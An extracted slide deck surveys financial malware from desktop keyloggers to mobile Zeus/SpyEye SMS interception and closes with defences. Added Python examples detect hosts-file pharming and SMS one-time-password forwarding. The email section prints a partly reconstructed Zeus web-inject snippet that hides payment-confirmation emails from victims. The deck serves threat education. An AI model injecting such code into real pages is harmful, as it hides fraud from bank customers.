A quick (de)tour of desktop financial malware

A Brief History of Desktop Financial Malware



• First generation: 2004-2005 

- Keyloggers 

- DNS changers 

• Second generation: 2006-2008 

- Plugin-based MitB 

- Remote control via C&C servers 

• Third generation: 2008 and beyond 

- Hook-based MitB (alteration of the browser process itself)

- Configurable 
Financial malware tricks



• Smart HTML injections (JS) 

• Dynamic injections (JS pulled from server) 

• Polymorphism, AV evasion 

• Dynamic Mule servers 

• IM human interface (e.g. Jabber) 

• Distributed C&C 

• Encrypted C&C traffic 

• Nifty server side GUI, DB, control panel 

• Botnet distribution "market" 
Going mobile

Mobile Malware Myths



• Mobile OSes are sandboxed

-> We're safe! 

• Mobile apps are controlled 

-> Apple & Google watch our back 

• There's no money to steal in mobile apps 

-> Fraudsters don't care 
Mobile Malware Evolution

Money-Making Mobile Malware



• Gen 0: Phone-Bill Inflation Malware 

- Send high-cost SMS messages 

- Call international fee-based premium numbers 

• Gen 1: Credential stealing 

- DNS changer pharming attack 

• Gen 2: Bypass out-of-band authentication

- Attack email, phone, SMS channels 

- Device takeover via SMS channel 

• Upcoming threats 

- Remotely controlled botnets 

- Attack mobile apps and mobile browsers 
Gen 0 Malware Examples



• Trojan-SMS.AndroidOS.FakePlayer

- Duplicates payment-approval SMS messages sent to fee-based (premium-rate) services

- Distributed outside the Android Market, mainly via adult content sites

• WinCE Terdial

- Dials premium-rate international numbers (Vanuatu, Somalia, São Tomé)

- Distributed as Trojanized versions of popular apps and games
Gen 1 Malware Examples



• iPhoneOS/Ikee.B

- Modifies the local hosts file to redirect bank customers to a phishing site

- Distribution: spreads over the network between jailbroken iPhones
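Added example (not part of the original deck): a small hosts-file check for the pharming technique above. It parses a constructed hosts file, ignores comments and malformed addresses, and reports any watched bank hostname that is mapped to a non-loopback address. The bank hostnames and the sample file are placeholders, not data from the slides.

```python
"""Detect hosts-file pharming (the Ikee.B trick): a bank hostname mapped
locally to an attacker address, so the browser never asks DNS.

Assumptions (not from the deck): the watchlist and the sample hosts file
below are constructed for the demo.
"""
import ipaddress
import re

# Hostnames that must never be overridden locally (assumed watchlist).
WATCHED_HOSTNAMES = {"bank.example", "www.bank.example", "secure.bank.example"}

# address, one or more names, optional trailing comment
HOSTS_LINE = re.compile(r"^\s*([^\s#]+)\s+([^#]+?)\s*(#.*)?$")


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in hosts-file text.

    Blank lines and comment lines are skipped and inline comments stripped.
    Unparseable addresses are skipped rather than raised on, because a
    malicious entry may be deliberately malformed to confuse naive parsers.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        m = HOSTS_LINE.match(raw)
        if not m:
            continue
        ip_str, names = m.group(1), m.group(2).split()
        try:
            ip = ipaddress.ip_address(ip_str)
        except ValueError:
            continue
        for name in names:
            yield ip, name.lower(), line_no


def find_pharming_entries(text, watched=WATCHED_HOSTNAMES):
    """Return watched hostnames mapped to anything other than loopback.

    A loopback mapping only breaks the site (denial of service); anything
    else is flagged: a public address is the classic pharming redirect, and
    even a private address is suspicious on a phone, since nothing legitimate
    should override a bank's DNS there.
    """
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name in watched and not ip.is_loopback:
            findings.append({"line": line_no, "hostname": name, "ip": str(ip)})
    return findings


# Constructed sample: a normal hosts file with one injected pharming entry,
# a commented-out decoy that must be ignored, and a loopback entry.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
# 203.0.113.7   bank.example                    <- comment, must be ignored
198.51.100.23   www.bank.example bank.example   # injected by malware
127.0.0.1       secure.bank.example             # loopback, not pharming
"""

if __name__ == "__main__":
    for f in find_pharming_entries(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['hostname']} -> {f['ip']}")
```

On a real device the same check would run against /etc/hosts (or the platform equivalent), and a hardened banking app can run it at start-up as one of its device-risk signals; it does not help once the malware also controls the app's own network stack.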
Gen 2 Malware
2011 - the year of Mobile Malware



Press clippings:

Google's Android wears big bullseye for mobile malware

Mobile Malware Threat: A Problem in 2011?
Could 2011 be the year when malware finally strikes personal and company-issued cell phones and smartphones?



New banking malware intercepts mobile authentication
authenticate commercial transactions, an IT security company has claimed to have detected the first co-ordinated mobile and desktop malware attack.

According to S21sec, the new variant of the ZeuS trojan first infects the victim's PC. Then a web application purporting to be from a bank asks the victim to input their mobile phone number and details of their device. Third, the victim is asked via text message to install an application on to the phone. This application can then be used to intercept any text messages the victim sends.
Generation 2 Mobile Malware



• Attack the Out of Band channel 

- SMS 

- Phone 

- email 

• Eliminate, modify, and intercept: 

- Authorization messages 

- Notification messages 

- One-time passwords 

• First generation device takeover 

- Via the SMS channel 
(Diagram: attack flow; only the label "Legitimate Website" survived extraction)
Zeus / SpyEye MitMo Capabilities



• Targets: BlackBerry, Symbian, Windows Mobile

• Commands delivered via the SMS channel:

- Display SMS: treat unmonitored SMS normally, display on the phone

- Delete/Drop SMS: hide SMS from the user 

- Forward SMS: Send SMS to hacker without the user's knowledge 

- Block Calls 

- Remove Block Calls 

- Add Sender 

- Remove Sender 

- Set Sender 

- Block/Unblock Phone Numbers 
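Added example, not from the deck or from either malware family: a device-side heuristic that looks for the "Forward SMS" plus "Delete/Drop SMS" combination above in an SMS event log, which is how the bank's one-time password reaches the fraudster while the victim never sees it. The log format, the bank sender ID "BANK", the phone numbers and the 120-second window are assumptions for the demo; a real SDK would take these events from the OS's SMS hooks rather than from text lines.

```python
"""Spot MitMo-style OTP interception in a device SMS event log.

Two behaviours are flagged: an OTP received from a monitored sender that
re-appears in an outbound SMS to a *different* peer shortly afterwards
(Forward SMS), and the monitored sender's message being deleted in the
same window (Delete/Drop SMS, hiding it from the user).

Assumptions (not from the deck): the log line format, the sender ID "BANK",
the phone numbers and the window are invented for the demo.
"""
import re
from datetime import datetime, timedelta

EVENT_RE = re.compile(
    r'^(?P<ts>\d{2}:\d{2}:\d{2}) (?P<kind>RECV|SEND|DELETE) '
    r'(?:from|to)=(?P<peer>\S+)(?: body="(?P<body>[^"]*)")?$'
)
# 4-8 digit token not embedded in a decimal amount such as 1200.00
OTP_RE = re.compile(r"(?<![\d.,])\d{4,8}(?![\d.,])")
MONITORED_SENDERS = {"BANK"}               # bank sender IDs to watch
FORWARD_WINDOW = timedelta(seconds=120)    # how quickly malware re-sends


def parse_events(lines):
    """Parse log lines into dicts; lines that do not match are ignored."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%H:%M:%S")
        events.append(ev)
    return events


def detect_otp_interception(lines, monitored=MONITORED_SENDERS):
    """Return (finding, sender, destination, time) tuples for suspicious
    forwarding or hiding of a monitored sender's OTP message."""
    events = parse_events(lines)
    findings = []
    for i, ev in enumerate(events):
        if ev["kind"] != "RECV" or ev["peer"] not in monitored:
            continue
        otps = set(OTP_RE.findall(ev["body"] or ""))
        deadline = ev["ts"] + FORWARD_WINDOW
        for later in events[i + 1:]:
            if later["ts"] > deadline:
                break
            # Replying to the bank itself is legitimate; a copy of the OTP
            # going anywhere else within the window is not.
            if (later["kind"] == "SEND" and later["peer"] != ev["peer"]
                    and otps & set(OTP_RE.findall(later["body"] or ""))):
                findings.append(("otp_forwarded", ev["peer"], later["peer"],
                                 later["ts"].strftime("%H:%M:%S")))
            if later["kind"] == "DELETE" and later["peer"] == ev["peer"]:
                findings.append(("otp_sms_hidden", ev["peer"], None,
                                 later["ts"].strftime("%H:%M:%S")))
    return findings


# Constructed sample log: one intercepted transfer OTP, then benign traffic.
SAMPLE_LOG = [
    '10:03:11 RECV from=BANK body="Transfer 1200.00 PLN: confirm with code 483921"',
    '10:03:12 SEND to=+15550100 body="483921"',      # forwarded to the fraudster
    '10:03:12 DELETE from=BANK',                     # hidden from the victim
    '10:15:40 RECV from=+15551234 body="lunch at 1?"',
    '10:16:02 SEND to=+15551234 body="sure, 1230"',  # benign, sender not monitored
    '11:40:00 RECV from=BANK body="Your balance is 5120.00"',  # no OTP inside
]

if __name__ == "__main__":
    for finding in detect_otp_interception(SAMPLE_LOG):
        print(finding)
```

The check only works if the monitoring component sees the messages before the malware suppresses them; on a device where the malware already controls the SMS stack (the "everything is in-band" case later in the deck) the bank has to assume the channel is lost and authorize from a source the phone cannot alter.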
Recorded Mobile Zeus/SpyEye Attacks



• Sept 2010: 1st observed attack

- Zeus

- Multiple Spanish banks

• Feb 2011: 2nd observed attack

- Zeus

- ING Poland

• Apr 2011: 3rd observed attack

- SpyEye

- Multiple German banks

• Key takeaway: 

- Complex mobile-desktop operation to reach the money 

- What happens when money can be transferred from a mobile device?
Generic downloader



• Breaks out of the security sandbox via OS exploits

- Patched in a newer OS version, but 99% of phones are not upgraded

- Roots the device to gain unrestricted control of the phone

- Downloads and installs arbitrary apps and sends data out

• Google eventually removed it from the store and from all devices

• Key takeaways:

- Mobile device sandboxing is software and therefore prone to exploits

- Mobile users don't update the OS, so vulnerabilities (even patched ones) have a long life

- A "closed/controlled garden" can't guarantee freedom from malware

- Shrink-wrapped jailbreaking for arbitrary malware installation is here
Email channel attacks



Zeus eliminates payment confirmation emails from web mail

- From a recent Zeus configuration (reconstructed from the garbled slide; the row index i comes from a loop over the web-mail inbox table that the slide does not show, so the loop is added here, and the "!= -1" missing from the second indexOf test is added so that it matches the first):

    for (var i = 0; i < document.getElementById("datatable").rows.length; i++) {
        if (document.getElementById("datatable").rows[i].innerHTML.indexOf("Faster Payment Confirmation") != -1 ||
            document.getElementById("datatable").rows[i].innerHTML.indexOf("Payment Created") != -1) {
            // Faster Payment Confirmation | Payment Created
            document.getElementById("datatable").rows[i].style.display = "none";  // hide the confirmation row from the victim
        }
    }

• Impact: users don't know funds were stolen

- 2nd line of defense breached
Future Threats

When Out of Band is In-band



• On mobile devices, everything is 'in-band' 

- SMS, phone, email 

• Malware on the device controls all channels 

• Fraudster's operations dramatically simplified 

- Compare to MitMo Zeus 

• Email notifications can be tampered with 
Browser-based financial malware



• Desktop financial malware concepts can be ported directly to mobile

- Browser tampering, keylogging, plug-ins, add-ons, HTML injection, ...

• Supporting technologies can be ported as-is:

- Back-end controls, GUI, databases

- Distributed C&C

- Encrypted C&C traffic

- Mule servers

• Malware downloaders are overcoming OS protections
Solution Landscape

• Anti-virus

- Specifically for mobile devices

• Secure Mobile Browsers

- Dedicated hardened browsers for secured access

• Application Hardening

- Block malware's ability to attack apps

• Early-stage mobile AV solutions are shipping

• Typically signature-based, extending desktop technologies to mobile devices

• Expect the same issues as on the desktop:

- Signature-based detection is prone to polymorphic malware

Secure Mobile Browsers



• Hardened browsers dedicated to access to specific sites

• Lock content 

- Site verification 

- MITM prevention 

- Pharming prevention 

• Validate device safety 

- Detect jailbreaks 

- Detect malware 

- Apply action policies based on risk 
Secure App Developer Kits



• Toolset for application developers to add hardening to their app

• Dedicated to mobile device security: 

- Device risk assessment 

- Jailbreak detection 

- Malware detection 

- Memory encryption 

- Incoming & outgoing SMS controls 

• Integrate into the apps via APIs

• Update periodically with new detections and policies
• Financial malware is coming

- Everything we've seen in the desktop world, and more

- At an accelerated pace

• Convergence of channels eliminates the "out of band" concept

• Plan and prepare a strategy before rolling out your mobile app/availability